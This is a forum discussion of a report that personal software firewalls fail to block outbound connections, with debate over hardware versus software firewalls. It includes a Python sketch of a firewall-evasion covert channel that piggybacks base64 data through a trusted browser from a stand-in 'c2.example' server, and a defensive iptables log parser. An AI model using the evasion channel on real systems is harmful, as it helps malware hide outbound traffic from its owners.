Personal Firewalls Mostly Useless, Says Mail & Guardian
hweimer writes "More and more security researchers come to the conclusion that personal firewalls are ineffective in controlling outbound traffic. An article in the Mail & Guardian online mentions a test that 'showed that the software often causes more problems than it solves. Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet.' Simple PoCs are available, too."
More and more security researchers come to the conclusion that personal firewalls are ineffective in controlling outbound traffic.
The article's about personal software firewalls, not personal hardware firewalls. Furthermore, the fact that personal software firewalls are useless and buggy is not really a new discovery.
Push Button, Receive Bacon
Well, that's what happens when you try to introduce a complex topic like network security into the consumer market, and subsequently fail at that task. They (the software manufacturers) fail not only in raising a suitable amount of awareness (if every single computer on the planet was behind a firewall, how many worms/malware would this stop?), but they also fail to do the job properly (not blocking outbound traffic) for those who do install their software.
There is nothing interesting going on at my blog
As a lesbian, I must protest to this offensive and disparaging comment.
Yes, they may be ineffective in controlling outbound traffic. However, that's not the real point of a personal firewall.
Without a personal firewall, users have a huge issue with inbound traffic when it comes to security, especially in the Windows "territories." I'll never forget the day that I left open an unpatched WinXP box after a fresh install. I watched all of the script kiddies and automated worms go at it from my passive OpenBSD monitoring box. That machine was hacked in under ten minutes just because I left it there, open to the Internet. So, useless? No.
Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet.
First, nothing is perfect. Second, if some nasty program/spyware/adware got in, then it's too late already. The best thing is to prevent them from getting in to begin with. Besides, most people don't know the difference between what should and should not be allowed to have access. I do some tech support for friends and family and it really gets annoying after the fifteenth call, "Should I let FooBar21.exe access the Internet?" I finally went with the policy of disabling any sort of outbound filtering in whatever firewall I set up for people I will be "supporting."
Personal firewalls do not block outbound connections because it is a pain in the ass to decide what can pass or not. I mean, did you ever try some Windows firewall that allows that? You get hundreds of warnings from obscure services trying to send unknown data to somewhere you do not want to know. Users are clueless about it; they will just check the box that says "shut up and hack my box" if it prevents further messages from appearing.
Stupidity is the root of all evil.
A firewall is a *device* between a device that needs 'protection' (usually a Windows PC) and an Internet connection. Keyword *device*, as in a separate physical piece of equipment. A piece of software running *on* a Windows PC is as vulnerable as the underlying system it runs on. I.e., completely useless. 'Software Firewall' is an oxymoron.
Not running Windows, but instead running either a proprietary platform or (preferred) something unix-based. The simplest is a simple one-way NAT (outbound connections allowed, inbound connections impossible without a specific, intentional mapping). These of course only protect against active outside attacks, and not against trojan/virus emails or websites visited from the PC. The most effective method of avoiding those is to avoid use of and remove (to the extent possible) all Microsoft email clients and web browsers from the PC.
Did they test ZoneAlarm? Because even with my best efforts to circumvent it (for testing), it's still able to block everything. Even as an Admin user, it's not possible to stop the service unless you "officially" exit the program. I've been using it for years, and I haven't once ever had a program that it didn't block (if I chose to block it). Even test software which was specifically meant to try to find holes in personal firewalls. The new version does other handy things too, like keeping an eye on software which tries to monitor your keyboard/mouse (such as keyloggers) and giving you the option to block them from doing that. Very handy.
The personal or desktop firewall is not supposed to be your first line of defense, it's supposed to be your last line of defense.
I recommend that people use both a hardware and software firewall, the hardware firewall protects you from the Internet in general. The software firewall protects you from the other computers on your local network.
But when it comes down to it, a firewall is as strong as its weakest link, which is almost always the end user. Running as admin while browsing, downloading software from untrusted sources... don't blame the firewall for user stupidity.
Most of the "secured" computers I've seen have 3, 4 or more firewalls installed and "working". If one firewall isn't stopping outbound connections, go install another one, you'll be twice as secure then.
Mac users, don't think you are safe because you aren't running Windows. It's amazing the number of apps that "phone home". A great tool for Mac OS X egress filtering is Little Snitch. It's cheap and easy to use.
Strange women lying in ponds distributing swords is no basis for a system of government.
The article makes a number of critical errors that impact its credibility.
The article expounds on the dangers of Javascript, but fails to mention ActiveX. I suspect the author had heard about "scripting" being a security hole and assumed incorrectly that the other person was talking about Javascript. JS is inconsequential compared to ActiveX when it comes to actual risk.
Additionally, when it claims that AV software essentially supersedes any firewall in terms of protection, it fails to consider the security nightmares in Windows. Specifically, through the trust relationships, you can modify registry settings and execute code on computers without your viral code ever touching the disk on the machine by doing it remotely from another computer. Because memory scanning is essentially ineffective, modern AV programs cannot effectively protect against this, which is why most security companies suggest combining AV with a Firewall. Plus, there are regular buffer overflow exploits that have the same effect: Code running without touching the disk. Where do they come from? Over the wire. Code Red and Nimda are good examples of attacks that were stopped by even the most basic firewalls. Safe browsing had no effect whatsoever on whether a user was infected.
Finally, the article fails to take into consideration the thought that goes into the automatic rule creation most firewalls come with now. Developers understand that users demand convenience and security, and work to find a good match of both. To this effect, most modern desktop firewalls will use signature-based rules (so that a malicious program has to do more than just be named after a trusted program) to create a basic rule that allows that program outbound access. The ports are not being just "left open" willy-nilly; they are connected to known programs and watched. Some firewall programs even watch for threadjacking malware that would inject itself directly into trusted programs, which gives even more protection.
The author of the article should reevaluate his or her knowledge of internet security. It is likely that the increasing ease of use has been interpreted as a drop in protection, but this is not the case. A secure system is one that uses a heterogeneous mix of disk and network protection.
A fundamental concept in computing nowadays is that software designers attempt to do as much thinking for the end user as possible. This is a generally good thing, as the easier/more intuitive software is to use, the more people will use it. That point aside, this can be a negative thing as it keeps users from needing to understand what they are actually doing. Using computers NEEDS at least a basic understanding of what's going on.
I don't mean everyone should study the TCP/IP stack and fully grasp ports and such, but seriously... you can't just show someone what a car does & explain the controls and then expect them to be able to drive properly & safely. It takes training & study.
The same is true with computers. I'm not suggesting an 'internet license' or anything, but I would recommend that high school core classes at least provide the basics of the underlying fundamentals of computing. Until someone understands what those firewalls are for, they will never reach a truly useful state.
Brad
So if I have a hardware firewall in my router is a software firewall useful as a last ditch defense? Or is it nothing more than an annoyance and resource hog?
Download my free songs!
Could not find the list of the six software packages tested. Don't know if Zone Alarm was tested and found to be defective too. But I would be surprised. Every time I update Firefox, Zone Alarm knows that the exe file has changed and alerts me to renew permission for it to connect to the internet.
sed -e 's/Chuck Norris/Rajnikant/g' joke > fact
The issue with most desktop software firewalls that attempt to control outbound connections is that they have no idea in advance what constitutes a valid program and what doesn't. So they ask the user, who in most cases is unable to answer the question. The only information typically provided is the executable name, and in many cases it's a generic one (like svchost.exe) that leaves even an experienced user without the ability to make an informed decision.
The problem is that this trains users to ignore the prompts and habitually click "allow" or "deny" (usually because they find out the hard way that stuff breaks when they click "deny"). The result is far worse than if there were no attempts to control outbound access, because most of these firewalls (Zonealarm in particular) use similar techniques for *inbound* traffic too... they will prompt the user when a program opens a listening port, and if they hit "allow" will enable global inbound traffic to that port, creating a hole that otherwise wouldn't have been there.
This happens regularly in practice- I've seen it over and over again with my small business consulting clients. Although technically an outbound software firewall with program control could be a good last-ditch effort to block malware that has managed to get installed and running, on a practical basis they cause more problems than they solve.
-R
Even though I'm behind a firewall, I use ZoneAlarm on all of my PCs so that I can catch what's communicating with the Internet and what's not. So far, it's done superbly well as far as I can tell.
For example, every time I play a media file in Windows Media Player, it tries to connect to the Internet not once but twice - once when Media Player fires up and once again after it's finished! Excuse me? Exactly what is Media Player trying to figure out? Well, whatever it is, it's none of their damned business. Check "Remember this setting", click "Deny", and done.
Every time a process tries to act like a server, ZA also notifies me of that as well. It's a bit of a pain when I fire up a game server for the first time and the pop-up balloon interferes with the screen (whoops), but again it just shows that it's at least doing what it's supposed to do.
ZoneAlarm has its share of issues, but it clearly goes with the attitude of "better safe than sorry". There have been some rare times where the program itself doesn't start, for whatever reason, but its service gets started. On those rare occasions I've noticed that the service, if it can't communicate with the control daemon, or whatever you want to call it, it just blocks all network access. It could have just allowed everything instead and there'd be no way of knowing if it's working or not. Personally, I'd rather have it block all access. Not only does that let me know that there's a problem, but it's certainly keeping the PC's network connection secure.
Using a hardware firewall for inbound and ZA for outbound connections makes perfect sense as far as I'm concerned. It's not trouble-free, but its stability has been getting better over the past several revisions from what I can tell.
The Overrated mod is for reversing inappropriate, positive mods, not for voicing disagreement with a post.
- G Data InternetSecurity 2006
- F-Secure Internet Security 2006
..my German is not so good.
- Kaspersky Internet Security 6
- Trend Micro PC-Cillin 14 Internet Security
- Symantec Norton Internet Security 2006
- Zonelabs Zonealarm Internet Security 2006
- McAfee Internet Security Suite 2006
- Computer Associates eTrust Internet Security Suite r2
- Panda Platinum Internet Security 2006
- Softwin Bitdefender 9 Internet Security
This is all I could find on the German site PC Professionell.
If slashdot, digg and friends were to link to printable versions, how long would it take for those sites either to remove the print version or to put their ads there?
Instant Karma's gonna get you, Gonna knock you right on the head (John Lennon, 1970)
This is why I run winpooch http://winpooch.free.fr/. It's not a firewall, but it does allow me to monitor my outgoing connections, and apply rules to them. For example, I can have it prompt me for every outbound, just announce when an outbound connection is established, or allow all outbound. Same thing with inbound. More complex rule sets are allowed as well.
It's not gonna save me from a worm itself, but it will tell me when I have a worm or rootkit making outbound connections.
And it allows me to use ClamWin to do on access scanning, tells me whenever an application tries to change the registry or system files, and provides a simple method to determine most of the potentially damaging processes running on my machine.
Best of all it's opensource.
Sometimes the best solution is to stop wasting time looking for an easy solution.
And where do you insert this "device" between your PC and the wireless router in the coffee shop or hotel room in which you're sitting? Wave it around in mid-air or something?
Besides that, the most useful purpose of these things isn't against trojans that someone's running because they're an idiot, it's software such as media players insisting on phoning home (for example, the "Microsoft Windows Media Configuration Utility" connection attempt that occurs when WM9 tries to update itself).
Okay, we are talking about Windows users: they will simply click 'Yes' to anything that pops up on the screen.
My view has always been that using a combination of things that help is the best idea. Using a router that has a hardware firewall + a software firewall + antivirus + a secure browser (Firefox) is a decent way to keep safe. This won't stop everything, but it's better than surfing around with no protection. Also add not doing stupid things to that equation for maximum protection.
I always get a kick out of people who set their firewall to prompt on every attempt to access the net, especially when they're running as admin on their boxes.
Even without the user running as admin, it's fairly easy to create a program to bypass outgoing firewalls. Basically the trick is to piggyback your communications over an existing application that's trusted.
Nearly everybody is going to trust IE (or Firefox, or whatever browser) to access the network. All you have to do is figure out a way to use that program to do your communications for you.
I once wrote a proof of concept app (in VB no less!) that used IE to do exactly this. I set up a simple piece of server software that accepted requests via HTTP GETs and returned the response as base64 encoded text in an HTML body. When my app needed to access remote data I just used IE to request that data from the server and then base64 decoded it. I could have also done something like have the server software act as a proxy so I could request any remote data I wanted, even if it wasn't hosted by my server. It was trivial.
The best part was that *every* major outgoing firewall failed to detect this attempt, despite the fact they claim to be able to tell when one application is using another to piggyback communications. Perhaps it was the way the COM interface worked, I'm not sure... but it never failed and never prompted me to allow it to happen.
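The piggyback channel described in the post above, as an added Python example that is not the poster's VB proof of concept and not code from any firewall vendor: both ends are modelled in one script so it runs offline. The backend contents, the `c2.example` host, the `r=` query parameter and the `<div id="d">` carrier are all constructed for this example; the `fetcher` callable stands in for the browser automation call (on Windows that would be the browser's COM interface), which is the only part that ever touches a socket.

```python
import base64
import re
from urllib.parse import parse_qs, urlencode, urlparse

# "Server" side. Hypothetical backend contents and page text, constructed
# for this example; nothing here comes from the original post.
FAKE_BACKEND = {
    "/secret/report.txt": b"export 2006-Q3\r\nid,name,amount\r\n1,alice,4200\r\n",
}

def build_query_url(base, resource):
    # The request is an ordinary GET; the resource name rides in the query string.
    return base + "?" + urlencode({"r": resource})

def server_handle_get(url):
    """Act like the tiny web server: answer a GET with an innocuous-looking
    HTML page whose body carries the requested bytes as base64."""
    resource = parse_qs(urlparse(url).query).get("r", [""])[0]
    data = FAKE_BACKEND.get(resource)
    if data is None:
        return 404, "<html><body>not found</body></html>"
    payload = base64.b64encode(data).decode("ascii")
    body = ("<html><head><title>Weather</title></head><body>"
            "<p>Forecast: mostly sunny.</p>"
            f'<div id="d">{payload}</div>'
            "</body></html>")
    return 200, body

# "Client" side: the part that runs inside the untrusted program. It never
# opens a socket; it only reads back the HTML the trusted browser fetched.
DIV_RE = re.compile(r'<div id="d">([A-Za-z0-9+/=]+)</div>')

def client_extract(body):
    """Pull the base64 blob out of the page and decode it; None if absent."""
    m = DIV_RE.search(body)
    return base64.b64decode(m.group(1)) if m else None

def fetch_via_trusted_app(fetcher, base, resource):
    """`fetcher` stands in for the automation call into the browser
    (on Windows this would be the browser's COM interface). Here it is
    a plain Python callable so the channel can be exercised offline."""
    status, body = fetcher(build_query_url(base, resource))
    return client_extract(body) if status == 200 else None

def roundtrip(resource):
    # The server is called directly in place of a real browser fetch.
    return fetch_via_trusted_app(server_handle_get, "http://c2.example/w", resource)

if __name__ == "__main__":
    print(roundtrip("/secret/report.txt"))
```

The point the exchange makes: a per-program outbound rule only ever sees the browser's own socket carrying an ordinary GET to a web server, so "allow browser" is enough to allow this. Catching it means watching cross-process automation on the host, or spotting the odd query pattern and oversized `<div>` payloads at a proxy, not inspecting which executable owns the socket.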
Linux has iptables which is very good for the job. Is it as good as BSD? I would argue less time consuming if you already run Linux, but it's not the same.
http://www.google.com/search?hs=3PG&hl=en&lr=&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=iptables&btnG=Search
Notes: I believe for stateful packet inspection, the kernel needs ip_conntrack and a few other things in it. Most distro kernels have this but it's worth double checking. From there, it's learning the iptables syntax which isn't hard after going through one of the many examples out there. Once you get logging going, check out intrusion prevention systems!
http://www.maxineudall.com/2010/02/should-economists-be-sued-for-malpractice.html
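What "getting logging going" buys you, as an added Python example that is not from the post above or from any iptables tutorial: it parses the kernel's netfilter LOG lines (the format produced by a rule such as `iptables -A INPUT -m state --state NEW -j LOG --log-prefix "IPT-DROP "`, with the prefix name chosen here) and reports which sources are sweeping ports, the kind of inbound noise an unpatched box sees within minutes. The log lines are constructed for this example and use documentation address ranges only.

```python
import re
from collections import defaultdict

# Constructed sample of netfilter LOG output; addresses are RFC 5737
# documentation ranges, not real hosts. The last line uses a different
# prefix to show that only the chosen prefix is counted.
SAMPLE_LOG = """\
Sep 14 03:12:01 gw kernel: IPT-DROP IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.9 DST=198.51.100.2 LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=41233 DF PROTO=TCP SPT=2914 DPT=445 WINDOW=16384 RES=0x00 SYN URGP=0
Sep 14 03:12:01 gw kernel: IPT-DROP IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.9 DST=198.51.100.2 LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=41234 DF PROTO=TCP SPT=2915 DPT=139 WINDOW=16384 RES=0x00 SYN URGP=0
Sep 14 03:12:02 gw kernel: IPT-DROP IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.9 DST=198.51.100.2 LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=41235 DF PROTO=TCP SPT=2916 DPT=135 WINDOW=16384 RES=0x00 SYN URGP=0
Sep 14 03:12:02 gw kernel: IPT-DROP IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=203.0.113.9 DST=198.51.100.2 LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=41236 DF PROTO=TCP SPT=2917 DPT=1025 WINDOW=16384 RES=0x00 SYN URGP=0
Sep 14 03:12:05 gw kernel: IPT-DROP IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=192.0.2.77 DST=198.51.100.2 LEN=404 TOS=0x00 PREC=0x00 TTL=51 ID=0 DF PROTO=UDP SPT=1434 DPT=1434 LEN=384
Sep 14 03:12:09 gw kernel: IPT-DROP IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=192.0.2.77 DST=198.51.100.2 LEN=404 TOS=0x00 PREC=0x00 TTL=51 ID=0 DF PROTO=UDP SPT=1434 DPT=1434 LEN=384
Sep 14 03:12:11 gw kernel: IPT-DROP IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=198.51.100.44 DST=198.51.100.2 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=9 DF PROTO=TCP SPT=51000 DPT=22 WINDOW=5840 RES=0x00 SYN URGP=0
Sep 14 03:12:12 gw kernel: ACCEPT-LOG IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 SRC=198.51.100.44 DST=198.51.100.2 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=10 DF PROTO=TCP SPT=51001 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0
"""

KV_RE = re.compile(r"(\w+)=(\S*)")
# Bare flag words netfilter emits without a value.
FLAG_WORDS = {"DF", "MF", "CE", "SYN", "ACK", "FIN", "RST", "PSH", "URG"}

def parse_line(line):
    """Return a dict for one netfilter LOG line, or None for anything else."""
    if " kernel: " not in line or "IN=" not in line:
        return None
    head, _, rest = line.partition(" kernel: ")
    prefix = "" if rest.startswith("IN=") else rest.split(" IN=", 1)[0].strip()
    fields = dict(KV_RE.findall(rest))  # later duplicates (UDP LEN) win
    flags = {tok for tok in rest.split() if tok in FLAG_WORDS}
    return {
        "ts": " ".join(head.split()[:3]),
        "prefix": prefix,
        "src": fields.get("SRC"),
        "dst": fields.get("DST"),
        "proto": fields.get("PROTO"),
        "dpt": int(fields["DPT"]) if fields.get("DPT", "").isdigit() else None,
        "syn": "SYN" in flags,
        "fields": fields,
    }

def summarize(log_text, drop_prefix="IPT-DROP", sweep_threshold=3):
    """Aggregate dropped NEW connections per source; a source touching
    at least `sweep_threshold` distinct destination ports is a sweep."""
    per_src = defaultdict(lambda: {"hits": 0, "ports": set(), "protos": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["prefix"] != drop_prefix or not rec["src"]:
            continue
        s = per_src[rec["src"]]
        s["hits"] += 1
        s["protos"].add(rec["proto"])
        if rec["dpt"] is not None:
            s["ports"].add(rec["dpt"])
    sweeps = sorted(src for src, s in per_src.items()
                    if len(s["ports"]) >= sweep_threshold)
    return dict(per_src), sweeps

def report(log_text):
    """Human-readable summary lines, busiest source first."""
    per_src, sweeps = summarize(log_text)
    lines = []
    for src, s in sorted(per_src.items(), key=lambda kv: -kv[1]["hits"]):
        tag = " SWEEP" if src in sweeps else ""
        lines.append(f"{src:<16} hits={s['hits']} ports={sorted(s['ports'])}{tag}")
    return lines

if __name__ == "__main__":
    print("\n".join(report(SAMPLE_LOG)))
```

The threshold on distinct destination ports is deliberately low because a SYN-only LOG rule on NEW state already filters out the noise of established flows; tune it against your own traffic before feeding the output to anything that blocks automatically.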
The response I get (yes, I'm the guy who wrote the tutorial) is that people find it quite useful.
The fact that it includes a few tips on how to give spammers a hard time helps too I guess.
-- That grumpy BSD guy - http://bsdly.blogspot.com/
I love how, whenever I go to my grandparents to fix their computer (after they've dealt with their ISP's tech support) the ethernet cable is always running straight to the PC and bypassing the router. It's hard enough to get average Joe to understand the usefulness of a hardware routing/firewall device, but when the ISP is actively having them bypass it I can see a software firewall being somewhat useful at times.